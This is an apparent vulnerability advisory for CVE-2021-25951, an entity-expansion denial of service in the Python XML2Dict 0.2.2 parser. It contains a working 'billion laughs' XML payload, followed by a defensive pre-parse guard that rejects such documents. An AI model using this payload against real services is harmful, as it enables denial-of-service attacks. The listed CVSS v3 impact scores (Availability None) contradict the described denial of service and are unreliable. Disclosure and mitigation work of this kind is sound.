

CVE-2021-25951

Date: June 30, 2021

Overview

An XML entity expansion ('XXE'-class) vulnerability in 'XML2Dict' version 0.2.2 allows an attacker to cause a denial of service.

Details

The PyPI module 'XML2Dict' is vulnerable to XML entity expansion: its `parse()` function places no limit on nested entity references declared in the DTD of a specially crafted XML document. An attacker who can get such a document parsed (one that defines a chain of entities, each referencing the previous one many times) forces the parser to expand an exponentially large amount of data, exhausting memory and causing a denial of service.

PoC Details

The function `parse()` accepts an XML document as input and converts it to a Python dictionary. Because it does not bound the expansion of nested entity definitions, a document of a few hundred bytes grows explosively when parsed (the payload below expands to 10^9 copies of a three-byte string), causing a denial of service.

PoC Code

from encoder import XML2Dict

xml2dic = XML2Dict()

# "Billion laughs" payload: each entity references the previous one ten times,
# so &lol9; expands to 10^9 copies of "lol" (about 3 GB) once parse() resolves it.
doc = """<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> """

xml2dic.parse(doc)  # triggers the expansion and exhausts memory (denial of service)

Affected Environments

0.2.2

Prevention

No fix version
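Because no fixed release exists, the caller has to reject expansion payloads before the document ever reaches the library. The following is an added example, not code from this page or from the XML2Dict project: a standard-library-only pre-parse guard that reads just the DTD with expat, works out arithmetically how large every declared entity would become if fully expanded, and refuses the document when any entity exceeds a size budget. Documents that pass are parsed with ElementTree here, but the same guard can run in front of `XML2Dict().parse()`. The budget `MAX_ENTITY_EXPANSION`, the helper names, and the embedded sample documents are assumptions constructed for the example.

```python
"""Pre-parse guard against XML entity-expansion ("billion laughs") payloads.

Added example, not XML2Dict project code. It inspects the DTD without
expanding anything, computes how large each internal entity would become
once fully expanded, and refuses the document if that exceeds a budget.
"""
import re
import xml.parsers.expat
from xml.etree import ElementTree as ET

# Policy choice for this example: no single entity may expand past 10 000 chars.
MAX_ENTITY_EXPANSION = 10_000

# General entity references inside replacement text; &#...; character
# references are excluded because each expands to a single character.
_ENTITY_REF = re.compile(r"&([^&;#\s]+);")
_PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}  # always one character


class UnsafeXML(ValueError):
    """The document declares entities we refuse to expand."""


class _PrologueDone(Exception):
    """Internal signal: the root element was reached, so the DTD is complete."""


def collect_entities(doc):
    """Return {name: literal replacement text} for the internal general
    entities declared in the DTD, without expanding any of them.

    External (SYSTEM/PUBLIC) and parameter entities are rejected outright:
    the former are classic XXE, the latter can pull in further DTD content.
    """
    entities = {}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            raise UnsafeXML("refusing external DTD subset")

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        if is_parameter or system_id is not None or public_id is not None:
            raise UnsafeXML("refusing external or parameter entity %r" % name)
        entities[name] = value or ""

    def on_start_element(name, attrs):
        # The first element ends the prologue: stop before any content
        # (and therefore any entity expansion) is processed.
        raise _PrologueDone

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start_element
    try:
        parser.Parse(doc, True)
    except _PrologueDone:
        pass
    return entities


def expanded_size(name, entities, memo, stack=()):
    """Characters `name` yields once all nested references are resolved,
    computed arithmetically rather than by building the string."""
    if name in _PREDEFINED:
        return 1
    if name in memo:
        return memo[name]
    if name in stack:
        raise UnsafeXML("recursive entity %r" % name)  # illegal XML anyway
    if name not in entities:
        raise UnsafeXML("undefined entity %r" % name)
    text = entities[name]
    size = len(_ENTITY_REF.sub("", text))  # literal characters only
    for ref in _ENTITY_REF.findall(text):
        size += expanded_size(ref, entities, memo, stack + (name,))
    memo[name] = size
    return size


def entity_expansion_sizes(doc):
    """Map every declared entity to its fully expanded size in characters."""
    entities = collect_entities(doc)
    memo = {}
    return {name: expanded_size(name, entities, memo) for name in entities}


def safe_parse(doc, max_expansion=MAX_ENTITY_EXPANSION):
    """Parse `doc` only if every declared entity stays within the budget."""
    for name, size in entity_expansion_sizes(doc).items():
        if size > max_expansion:
            raise UnsafeXML("entity %r would expand to %d characters" % (name, size))
    return ET.fromstring(doc)


def is_rejected(doc):
    """True if the guard refuses `doc`; convenience wrapper for demonstrations."""
    try:
        safe_parse(doc)
    except UnsafeXML:
        return True
    return False


# Constructed sample inputs. BILLION_LAUGHS has the CVE-2021-25951 payload shape:
# ten levels of tenfold nesting, so &lol9; expands to 10**9 copies of "lol".
_LEVELS = ['<!ENTITY lol "lol">']
for _i in range(1, 10):
    _prev = "lol" if _i == 1 else "lol%d" % (_i - 1)
    _LEVELS.append('<!ENTITY lol%d "%s">' % (_i, ("&%s;" % _prev) * 10))
BILLION_LAUGHS = (
    '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(_LEVELS)
    + "\n]>\n<lolz>&lol9;</lolz>\n"
)
# Legitimate use of a small internal entity, which the guard must still allow.
BENIGN = '<!DOCTYPE note [<!ENTITY co "Acme &amp; Co.">]><note>&co;</note>'

if __name__ == "__main__":
    print(entity_expansion_sizes(BILLION_LAUGHS)["lol9"])   # 3000000000
    print(is_rejected(BILLION_LAUGHS), is_rejected(BENIGN))  # True False
    print(safe_parse(BENIGN).text)                           # Acme & Co.
```

The check costs time proportional to the size of the DTD, not to the size of the expansion: the 3 GB figure for `lol9` is computed as 3 × 10^9 without ever materialising it. Rejecting SYSTEM/PUBLIC and parameter entities in the same pass also closes the external-entity side of CWE-611, which the CWE assignment above covers but the page's PoC does not exercise.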

Language: Python

Good to know:

Improper Restriction of XML External Entity Reference ('XXE')
CWE-611

Upgrade Version

No fix version available

CVSS v3 base score metrics:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): High
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

CVSS v2 base score metrics:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None